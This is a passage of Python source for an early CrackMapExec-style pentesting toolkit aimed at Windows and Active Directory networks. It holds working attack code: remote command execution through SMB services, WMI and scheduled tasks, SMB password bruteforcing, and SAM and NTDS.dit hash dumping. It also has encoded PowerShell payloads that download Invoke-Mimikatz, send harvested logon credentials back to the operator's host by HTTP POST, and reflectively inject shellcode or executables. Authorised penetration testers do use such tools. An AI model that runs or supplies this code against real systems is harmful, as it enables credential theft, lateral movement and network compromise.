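            # actually run, so poll until a real timestamp shows up.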
while not done:
logging.info('Calling SchRpcGetLastRunInfo for \\%s' % self.__tmpName)
resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % self.__tmpName)
if resp['pLastRuntime']['wYear'] != 0:
done = True
else:
sleep(2)
logging.info('Deleting task \\%s' % self.__tmpName)
tsch.hSchRpcDelete(dce, '\\%s' % self.__tmpName)
taskCreated = False
        except tsch.DCERPCSessionError as e:
logging.info(e)
e.get_packet().dump()
finally:
if taskCreated is True:
tsch.hSchRpcDelete(dce, '\\%s' % self.__tmpName)
if self.__noOutput is False:
if self.__mode == 'SHARE':
smbConnection = rpctransport.get_smb_connection()
self.__smbConnection = smbConnection
waitOnce = True
while True:
try:
logging.info('Attempting to read ADMIN$\\Temp\\%s' % self.__tmpFileName)
smbConnection.getFile('ADMIN$', 'Temp\\%s' % self.__tmpFileName, output_callback)
break
                    except Exception as e:
if str(e).find('SHARING') > 0:
sleep(3)
elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
if waitOnce is True:
# We're giving it the chance to flush the file before giving up
sleep(3)
waitOnce = False
else:
raise
else:
raise
elif self.__mode == 'SERVER':
wait = 0
while wait < 5:
try:
with open(SMBSERVER_DIR + '/' + self.__tmpFileName,'r') as fd:
output_callback(fd.read())
break
except IOError:
sleep(1)
wait += 1
def cleanup(self):
logging.info('Deleting file ADMIN$\\Temp\\%s' % self.__tmpFileName)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % self.__tmpFileName)
self.__dceConnection.disconnect()
class RemoteShellsmbexec():
def __init__(self, share, rpc, mode, serviceName, command, noOutput=False):
self.__share = share
self.__mode = mode
self.__noOutput = noOutput
self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME
self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
self.__outputBuffer = ''
self.__command = command
self.__shell = '%COMSPEC% /Q /c '
self.__serviceName = serviceName
self.__rpc = rpc
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
s = rpc.get_smb_connection()
        # We don't want to deal with timeouts from now on.
s.setTimeout(100000)
if mode == 'SERVER':
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
self.transferClient = rpc.get_smb_connection()
def set_copyback(self):
s = self.__rpc.get_smb_connection()
s.setTimeout(100000)
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(svcctl.MSRPC_UUID_SVCCTL)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
        except Exception:
pass
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__noOutput is True:
self.__outputBuffer = ''
return
if self.__mode == 'SHARE':
while True:
try:
self.transferClient.getFile(self.__share, self.__output, output_callback)
break
                except Exception as e:
if "STATUS_OBJECT_NAME_NOT_FOUND" in str(e):
sleep(1)
pass
else:
logging.info('Error while reading command output: {}'.format(e))
raise SessionError
self.transferClient.deleteFile(self.__share, self.__output)
elif self.__mode == 'SERVER':
with open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r') as fd:
output_callback(fd.read())
#self.transferClient.deleteFile(self.__share, self.__output)
def execute_remote(self, data):
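        # Write a one-shot batch file on the target: the carets escape the
        # redirection so it applies when the batch runs (sending the
        # payload's output to self.__output), not when the echo itself is
        # executed.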
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
if self.__mode == 'SERVER' and self.__noOutput is False:
command += ' & ' + self.__copyBack
command += ' & ' + 'del ' + self.__batchFile
try:
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
except:
return
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
result = self.__outputBuffer
self.__outputBuffer = ''
return result
class CMDEXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
}
def __init__(self, protocols = None, username = '', password = '', domain = '', hashes = '', share = None, command= None, noOutput=False):
if not protocols:
protocols = CMDEXEC.KNOWN_PROTOCOLS.keys()
self.__username = username
self.__password = password
self.__protocols = [protocols]
self.__serviceName = self.service_generator()
self.__domain = domain
self.__command = command
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = None
self.__doKerberos = None
self.__share = share
self.__noOutput = noOutput
self.__mode = 'SHARE'
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def service_generator(self, size=6, chars=string.ascii_uppercase):
return ''.join(random.choice(chars) for _ in range(size))
def run(self, addr):
result = ''
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
#logging.info("Trying protocol %s..." % protocol)
#logging.info("Creating service %s..." % self.__serviceName)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport,'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
try:
self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command, self.__noOutput)
result = self.shell.send_data(self.__command)
except SessionError as e:
if 'STATUS_SHARING_VIOLATION' in str(e):
return
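                # Reading the output from the remote share failed; fall back
                # to SERVER mode, hosting our own SMB share so the target
                # copies the output back to us.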
if self.__noOutput is False:
logging.info('Starting SMB Server')
smb_server = SMBServer()
smb_server.daemon = True
smb_server.start()
self.__mode = 'SERVER'
self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command)
self.shell.set_copyback()
result = self.shell.send_data(self.__command)
smb_server.stop()
            except (Exception, KeyboardInterrupt):
self.shell.finish()
sys.stdout.flush()
sys.exit(1)
return result
class RemoteShellwmi():
def __init__(self, share, win32Process, smbConnection, mode, noOutput=False):
self.__share = share
self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME
self.__outputBuffer = ''
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = 'C:\\'
self.__noOutput = noOutput
self.__mode = mode
        # We don't want to deal with timeouts from now on.
self.__transferClient.setTimeout(100000)
self.__myIPaddr = self.__transferClient.getSMBServer().get_socket().getsockname()[0]
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__noOutput is True:
self.__outputBuffer = ''
return
if self.__mode == 'SHARE':
while True:
try:
self.__transferClient.getFile(self.__share, self.__output, output_callback)
break
                except Exception as e:
if "STATUS_SHARING_VIOLATION" in str(e):
sleep(1)
pass
else:
logging.info('Error while reading command output: {}'.format(e))
raise SessionError
self.__transferClient.deleteFile(self.__share, self.__output)
elif self.__mode == 'SERVER':
wait = 0
while wait < 5:
try:
with open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r') as fd:
output_callback(fd.read())
break
except IOError:
sleep(1)
wait += 1
def execute_remote(self, data):
command = self.__shell + data
if self.__noOutput is False:
if self.__mode == 'SERVER':
command += ' 1> ' + '\\\\{}\\{}\\{}'.format(self.__myIPaddr, DUMMY_SHARE, OUTPUT_FILENAME) + ' 2>&1'
elif self.__mode == 'SHARE':
command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1'
obj = self.__win32Process.Create(command, self.__pwd, None)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
result = self.__outputBuffer
self.__outputBuffer = ''
return result
class WMIEXEC:
def __init__(self, command = '', username = '', password = '', domain = '', hashes = '', share = None, noOutput=False):
self.__command = command
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = None
self.__share = share
self.__noOutput = noOutput
self.__doKerberos = False
self.__mode = "SHARE"
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr, smbConnection):
result = ''
dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver = True, doKerberos=self.__doKerberos)
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process,_ = iWbemServices.GetObject('Win32_Process')
try:
self.shell = RemoteShellwmi(self.__share, win32Process, smbConnection, self.__mode, self.__noOutput)
result = self.shell.send_data(self.__command)
except SessionError as e:
if self.__noOutput is False:
logging.info('Starting SMB Server')
smb_server = SMBServer()
smb_server.daemon = True
smb_server.start()
self.__mode = 'SERVER'
self.shell = RemoteShellwmi(self.__share, win32Process, smbConnection, self.__mode)
result = self.shell.send_data(self.__command)
smb_server.stop()
dcom.disconnect()
return result
class WMIQUERY:
def __init__(self, address, username, password, domain, hashes, namespace):
self.address = address
self.username = username
self.password = password
self.domain= domain
self.namespace = namespace
self.lmhash = ''
self.nthash = ''
if hashes:
self.lmhash, self.nthash = hashes.split(':')
def run(self, query):
record_dict = {}
dcom = DCOMConnection(self.address, self.username, self.password, self.domain, self.lmhash, self.nthash, None, oxidResolver = True, doKerberos=False)
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin(self.namespace, NULL, NULL)
iWbemLevel1Login.RemRelease()
query = query.strip('\n')
if query[-1:] == ';':
query = query[:-1]
iEnumWbemClassObject = iWbemServices.ExecQuery(query.strip('\n'))
printHeader = True
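        # Next(0xffffffff, 1) fetches one object per call; the enumeration
        # signals its end by raising with S_FALSE, which breaks the loop.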
while True:
try:
pEnum = iEnumWbemClassObject.Next(0xffffffff,1)[0]
record = pEnum.getProperties()
if printHeader is True:
for col in record:
record_dict[str(col)] = []
printHeader = False
for key in record:
record_dict[key].append(str(record[key]['value']))
except Exception as e:
if str(e).find('S_FALSE') < 0:
raise
else:
break
iEnumWbemClassObject.RemRelease()
dcom.disconnect()
return record_dict
class RPCENUM():
def __init__(self, username, password, domain='', hashes=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
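        # 8a885d04-1ceb-11c9-9fe8-08002b104860 v2.0 is the standard 32-bit
        # NDR transfer syntax, passed explicitly to the bind() calls below.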
self.__ts = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')
if hashes:
self.__lmhash, self.__nthash = hashes.split(':')
def connect(self, host, service):
if service == 'wkssvc':
stringBinding = r'ncacn_np:{}[\PIPE\wkssvc]'.format(host)
elif service == 'srvsvc':
stringBinding = r'ncacn_np:{}[\PIPE\srvsvc]'.format(host)
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
if service == 'wkssvc':
dce.bind(wkst.MSRPC_UUID_WKST, transfer_syntax = self.__ts)
elif service == 'srvsvc':
dce.bind(srvs.MSRPC_UUID_SRVS, transfer_syntax = self.__ts)
return dce, rpctransport
def enum_logged_on_users(self, host):
dce, rpctransport = self.connect(host, 'wkssvc')
users_info = {}
try:
resp = wkst.hNetrWkstaUserEnum(dce, 1)
return resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']
except Exception:
resp = wkst.hNetrWkstaUserEnum(dce, 0)
return resp['UserInfo']['WkstaUserInfo']['Level0']['Buffer']
def enum_sessions(self, host):
dce, rpctransport = self.connect(host, 'srvsvc')
session_info = {}
try:
resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 502)
return resp['InfoStruct']['SessionInfo']['Level502']['Buffer']
except Exception:
resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 0)
return resp['InfoStruct']['SessionInfo']['Level0']['Buffer']
#resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 1)
#resp.dump()
#resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 2)
#resp.dump()
#resp = srvs.hNetrSessionEnum(dce, NULL, NULL, 10)
#resp.dump()
def spider(smb_conn,ip, share, subfolder, patt, depth):
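    """Recursively list `share` starting at `subfolder`, matching entries
    against the patterns in `patt` and descending until `depth` is exhausted."""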
try:
filelist = smb_conn.listPath(share, subfolder+'\\*')
dir_list(filelist, ip, subfolder, patt)
if depth == 0:
return 0
except SessionError:
return 1
for result in filelist:
if result.is_directory() and result.get_longname() != '.' and result.get_longname() != '..':
spider(smb_conn, ip, share,subfolder+'/'+result.get_longname().encode('utf8'), patt, depth-1)
return 0
def dir_list(files,ip,path,pattern):
for result in files:
for instance in pattern:
if instance in result.get_longname():
if result.is_directory():
print_att("//%s/%s/%s [dir]" % (ip, path.replace("//",""), result.get_longname().encode('utf8')))
else:
print_att("//%s/%s/%s" % (ip, path.replace("//",""), result.get_longname().encode('utf8')))
return 0
def bruteforce(host, smb, s_name, domain):
usernames = open(args.bruteforce[0], 'r')
passwords = open(args.bruteforce[1], 'r')
for user in usernames:
passwords.seek(0)
for passw in passwords:
try:
#print "Trying {}:{}".format(user.strip(),passw.strip())
smb.login(user.strip(), passw.strip(), domain, '', '')
print_succ("{}:{} {} Found valid account! Domain: {} Username: {} Password: {}".format(host, args.port, s_name, yellow(domain), yellow(user.strip()), yellow(passw.strip())))
if args.exhaust is False:
return
except SessionError as e:
if "STATUS_LOGON_FAILURE" in e.message:
pass
def normalize_path(path):
    """Normalize a Windows path and strip a leading share component (e.g. 'C$')."""
    if not path:
        return path
    path = ntpath.normpath(path)
    share = path.split('\\')[0]
    if ':' in share or '$' in share:
        path = path.replace(share, '')
    return path
def _listShares(smb):
permissions = {}
root = ntpath.normpath("\\{}".format(PERM_DIR))
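    # Probe each share: a successful listPath() means READ access, and a
    # createDirectory()/deleteDirectory() round-trip on the PERM_DIR scratch
    # folder means WRITE access.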
for share in smb.listShares():
share_name = share['shi1_netname'][:-1].encode('utf8')
permissions[share_name] = "NO ACCESS"
try:
if smb.listPath(share_name, '', args.passwd):
permissions[share_name] = "READ"
except:
pass
try:
if smb.createDirectory(share_name, root):
smb.deleteDirectory(share_name, root)
permissions[share_name] = "READ, WRITE"
except:
pass
return permissions
def ps_command(command=None, katz_ip=None):
if katz_ip:
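        # Download Invoke-Mimikatz from our HTTP server, dump logon
        # credentials, then POST the result back to the same listener.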
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit";
$request = [System.Net.WebRequest]::Create('http://{addr}');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();
""".format(addr=katz_ip)
return b64encode(command.encode('UTF-16LE'))
def inject_pscommand(localip):
if args.inject == 'shellcode':
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1');
$WebClient = New-Object System.Net.WebClient;
[Byte[]]$bytes = $WebClient.DownloadData('http://{addr}/{shellcode}');
Invoke-Shellcode -Force -Shellcode $bytes""".format(addr=localip, shellcode=args.path.split('/')[-1])
if args.procid:
command += " -ProcessID {}".format(args.procid)
command += ';'
elif args.inject == 'exe' or args.inject == 'dll':
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-ReflectivePEInjection.ps1');
Invoke-ReflectivePEInjection -PEUrl http://{addr}/{pefile}""".format(addr=localip, pefile=args.path.split('/')[-1])
if args.procid:
command += " -ProcID {}"
if args.inject == 'exe' and args.exeargs:
command += " -ExeArgs \"{}\"".format(args.exeargs)
command += ';'
return ps_command(command)
def connect(host):
try:
smb = SMBConnection(host, host, None, args.port)
try:
smb.login('' , '')
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.message:
pass
domain = args.domain
s_name = smb.getServerName()
if not domain:
domain = smb.getServerDomain()
if not domain:
domain = s_name
print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
        # DCs seem to want us to log off first.
        # Workstations sometimes reset the connection, so we handle that here.
try:
smb.logoff()
except NetBIOSError:
pass
except socket.error:
smb = SMBConnection(host, host, None, args.port)
if args.bruteforce:
start_time = time()
print_status("{}:{} {} Started SMB bruteforce".format(host, args.port, s_name))
bruteforce(host, smb, s_name, domain)
print_status("{}:{} {} Finished SMB bruteforce (Completed in: {})".format(host, args.port, s_name, time() - start_time))
if args.user is not None and (args.passwd is not None or args.hash is not None):
lmhash = ''
nthash = ''
if args.hash:
lmhash, nthash = args.hash.split(':')
noOutput = False
smb.login(args.user, args.passwd, domain, lmhash, nthash)
local_ip = smb.getSMBServer().get_socket().getsockname()[0]
if args.download:
try:
out = open(args.download.split('\\')[-1], 'wb')
smb.getFile(args.share, args.download, out.write)
print_succ("{}:{} {} Downloaded file".format(host, args.port, s_name))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.delete:
try:
smb.deleteFile(args.share, args.delete)
print_succ("{}:{} {} Deleted file".format(host, args.port, s_name))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.upload:
try:
up = open(args.upload[0] , 'rb')
smb.putFile(args.share, args.upload[1], up.read)
print_succ("{}:{} {} Uploaded file".format(host, args.port, s_name))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.list:
try:
dir_list = smb.listPath(args.share, args.list + '\\*')
print_succ("{}:{} Contents of {}:".format(host, args.port, args.list))
for f in dir_list:
print_att("%crw-rw-rw- %10d %s %s" % ('d' if f.is_directory() > 0 else '-', f.get_filesize(), ctime(float(f.get_mtime_epoch())) ,f.get_longname()))
except SessionError as e:
print_error('{}:{} {}'.format(host, args.port, e))
if args.spider:
start_time = time()
print_status("{}:{} {} Started spidering".format(host, args.port, s_name))
spider(smb, host, args.share, args.spider, args.pattern, args.depth)
print_status("{}:{} {} Done spidering (Completed in {})".format(host, args.port, s_name, time() - start_time))
if args.wmi_query:
query = WMIQUERY(host, args.user, args.passwd, domain, args.hash, args.namespace)
res = query.run(args.wmi_query)
print_succ("{}:{} {} Executed specified WMI query:".format(host, args.port, s_name))
print yellow(' | '.join(res.keys()))
if len(res.values()) > 1:
for v in map(None, *res.values()):
print yellow(' | '.join(v))
else:
for k in res:
for v in res[k]:
print yellow(v)
if args.enum_sessions:
rpcenum = RPCENUM(args.user, args.passwd, domain, args.hash)
sessions = rpcenum.enum_sessions(host)
print_succ("{}:{} {} Current active sessions:".format(host, args.port, s_name))
for session in sessions:
for fname in session.fields.keys():
print "{} {}".format(fname, yellow(session[fname]))
print "\n"
if args.enum_lusers:
rpcenum = RPCENUM(args.user, args.passwd, domain, args.hash)
lusers = rpcenum.enum_logged_on_users(host)
print_succ("{}:{} {} Logged on users:".format(host, args.port, s_name))
for luser in lusers:
for fname in luser.fields.keys():
print "{} {}".format(fname, yellow(luser[fname]))
print "\n"
if args.sam:
sam_dump = DumpSecrets(host, args.user, args.passwd, domain, args.hash, True)
sam_dump.dump(smb)
if sam_dump.dumped_sam_hashes:
print_succ("{}:{} {} Dumping local SAM hashes (uid:rid:lmhash:nthash):".format(host, args.port, s_name))
for sam_hash in sam_dump.dumped_sam_hashes:
print_att(sam_hash)
try:
sam_dump.cleanup()
except:
pass
if args.ntds:
vss = False
ninja = False
if args.ntds == 'vss': vss = True
if args.ntds == 'ninja': ninja = True
ntds_dump = DumpSecrets(host, args.user, args.passwd, domain, args.hash, False, True, vss, ninja)
ntds_dump.dump(smb)
if ntds_dump.dumped_ntds_hashes:
print_succ("{}:{} {} Dumping NTDS.dit secrets using the {} method (domain\uid:rid:lmhash:nthash):".format(host, args.port, s_name, args.ntds.upper()))
for h in ntds_dump.dumped_ntds_hashes['hashes']:
print_att(h)
print_succ("{}:{} {} Kerberos keys grabbed:".format(host, args.port, s_name))
for h in ntds_dump.dumped_ntds_hashes['kerb']:
print_att(h)
ntds_dump.cleanup()
if args.enum_users:
user_dump = SAMRDump("{}/SMB".format(args.port), args.user, args.passwd, domain, args.hash).dump(host)
print_succ("{}:{} {} {} ( LockoutTries={} LockoutTime={} )".format(host, args.port, s_name, yellow(user_dump['users']), user_dump['lthresh'], user_dump['lduration']))
if args.mimikatz:
noOutput = True
args.command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(ps_command(katz_ip=local_ip))
if args.pscommand:
args.command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(ps_command(command=args.pscommand))
if args.inject:
noOutput = True
args.command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(inject_pscommand(local_ip))
if args.command:
if args.execm == 'smbexec':
executer = CMDEXEC('{}/SMB'.format(args.port), args.user, args.passwd, domain, args.hash, args.share, args.command, noOutput)
result = executer.run(host)
if result:
print_succ('{}:{} {} Executed specified command via SMBEXEC'.format(host, args.port, s_name))
print_att(result)
elif args.execm == 'wmi':
executer = WMIEXEC(args.command, args.user, args.passwd, domain, args.hash, args.share, noOutput)
result = executer.run(host, smb)
if result:
print_succ('{}:{} {} Executed specified command via WMI'.format(host, args.port, s_name))
print_att(result)
elif args.execm == 'atexec':
atsvc_exec = TSCH_EXEC(args.user, args.passwd, args.command, domain, args.hash, noOutput)
atsvc_exec.play(host)
if atsvc_exec.output:
print_succ('{}:{} {} Executed specified command via ATEXEC'.format(host, args.port, s_name))
print_att(atsvc_exec.output)
atsvc_exec.cleanup()
if args.list_shares:
share_list = _listShares(smb)
print_succ('{}:{} {} Available shares:'.format(host, args.port, s_name))
print_att('\tSHARE\t\t\tPermissions')
print_att('\t-----\t\t\t-----------')
for share, perm in share_list.iteritems():
print_att('\t{}\t\t\t{}'.format(share, perm))
try:
smb.logoff()
except:
pass
except SessionError as e:
print_error("{}:{} {}".format(host, args.port, e))
if args.verbose: traceback.print_exc()
except DCERPCException as e:
print_error("{}:{} DCERPC Error: {}".format(host, args.port, e))
if args.verbose: traceback.print_exc()
except socket.error as e:
return
def concurrency(hosts):
''' Open all the greenlet threads '''
try:
pool = Pool(args.threads)
jobs = [pool.spawn(connect, str(host)) for host in hosts]
joinall(jobs)
except KeyboardInterrupt:
print_status("Got CTRL-C! Exiting..")
sys.exit()
if __name__ == '__main__':
    if os.geteuid() != 0:
print_error("Run me as r00t!")
sys.exit(1)
parser = argparse.ArgumentParser(description="""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r
Powered by Impacket https://github.com/CoreSecurity/impacket (@agsolino)
Inspired by:
@ShawnDEvans's smbmap https://github.com/ShawnDEvans/smbmap
@gojhonny's CredCrack https://github.com/gojhonny/CredCrack
@pentestgeek's smbexec https://github.com/pentestgeek/smbexec
""",
formatter_class=RawTextHelpFormatter,
epilog='There\'s been an awakening... have you felt it?')
parser.add_argument("-t", type=int, dest="threads", required=True, help="Set how many concurrent threads to use")
parser.add_argument("-u", metavar="USERNAME", dest='user', default=None, help="Username, if omitted null session assumed")
parser.add_argument("-p", metavar="PASSWORD", dest='passwd', default=None, help="Password")
parser.add_argument("-H", metavar="HASH", dest='hash', default=None, help='NTLM hash')
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='Namespace name (default //./root/cimv2)')
parser.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, help="Domain name")
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
parser.add_argument("-P", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
rgroup = parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
rgroup.add_argument("--sam", action='store_true', help='Dump SAM hashes from target systems')
rgroup.add_argument("--mimikatz", action='store_true', help='Run Invoke-Mimikatz on target systems')
rgroup.add_argument("--ntds", choices={'vss', 'drsuapi', 'ninja'}, help="Dump the NTDS.dit from target DCs using the specifed method\n(drsuapi is the fastest)")
egroup = parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")
egroup.add_argument("--shares", action="store_true", dest="list_shares", help="List shares")
egroup.add_argument("--sessions", action='store_true', dest='enum_sessions', help='Enumerate active sessions')
egroup.add_argument("--users", action='store_true', dest='enum_users', help='Enumerate users')
egroup.add_argument("--lusers", action='store_true', dest='enum_lusers', help='Enumerate logged on users')
egroup.add_argument("--wmi", metavar='QUERY', type=str, dest='wmi_query', help='Issues the specified WMI query')
dgroup = parser.add_argument_group("Account Bruteforcing", "Options for bruteforcing SMB accounts")
dgroup.add_argument("--bruteforce", nargs=2, metavar=('USER_FILE', 'PASS_FILE'), help="Your wordlists containing Usernames and Passwords")
dgroup.add_argument("--exhaust", action='store_true', help="Don't stop on first valid account found")
sgroup = parser.add_argument_group("Spidering", "Options for spidering shares")
sgroup.add_argument("--spider", metavar='FOLDER', type=str, default='', help='Folder to spider (defaults to share root dir)')
sgroup.add_argument("--pattern", type=str, default= '', help='Pattern to search for in filenames and folders')
sgroup.add_argument("--patternfile", type=argparse.FileType('r'), help='File containing patterns to search for')
sgroup.add_argument("--depth", type=int, default=1, help='Spider recursion depth (default: 1)')
cgroup = parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument('--execm', choices={"wmi", "smbexec", "atexec"}, default="smbexec", help="Method to execute the command (default: smbexec)")
cgroup.add_argument("-x", metavar="COMMAND", dest='command', help="Execute the specified command")
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
xgroup = parser.add_argument_group("Shellcode/EXE/DLL injection", "Options for injecting Shellcode/EXE/DLL's using PowerShell")
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll'}, help='Inject Shellcode, EXE or a DLL')
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)')
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
bgroup = parser.add_argument_group("Filesystem interaction", "Options for interacting with filesystems")
bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
bgroup.add_argument("--download", metavar="PATH", help="Download a file from the remote systems")
bgroup.add_argument("--upload", nargs=2, metavar=('SRC', 'DST'), help="Upload a file to the remote systems")
bgroup.add_argument("--delete", metavar="PATH", help="Delete a remote file")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.verbose:
print_status("Verbose output enabled")
logging.basicConfig(format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logging.getLogger()
log.setLevel(logging.INFO)
if args.path:
if not os.path.exists(args.path):
print_error('Unable to find Shellcode/EXE/DLL at specified path')
sys.exit(1)
if os.path.exists(args.target[0]):
hosts = []
with open(args.target[0], 'r') as target_file:
for target in target_file:
                hosts.append(IPAddress(target.strip()))
elif '-' in args.target[0]:
ip_range = args.target[0].split('-')
try:
hosts = IPRange(ip_range[0], ip_range[1])
except AddrFormatError:
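        # Shorthand like 192.168.1.10-50: reuse the start address and swap
        # in the final octet to build the end of the range.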
start_ip = IPAddress(ip_range[0])
start_ip_words = list(start_ip.words)
start_ip_words[-1] = ip_range[1]
start_ip_words = [str(v) for v in start_ip_words]
end_ip = IPAddress('.'.join(start_ip_words))
hosts = IPRange(start_ip, end_ip)
else:
hosts = IPNetwork(args.target[0])
args.list = normalize_path(args.list)
args.download = normalize_path(args.download)
args.delete = normalize_path(args.delete)
if args.upload: args.upload[1] = normalize_path(args.upload[1])
if args.spider:
patterns = []
if not args.pattern and not args.patternfile:
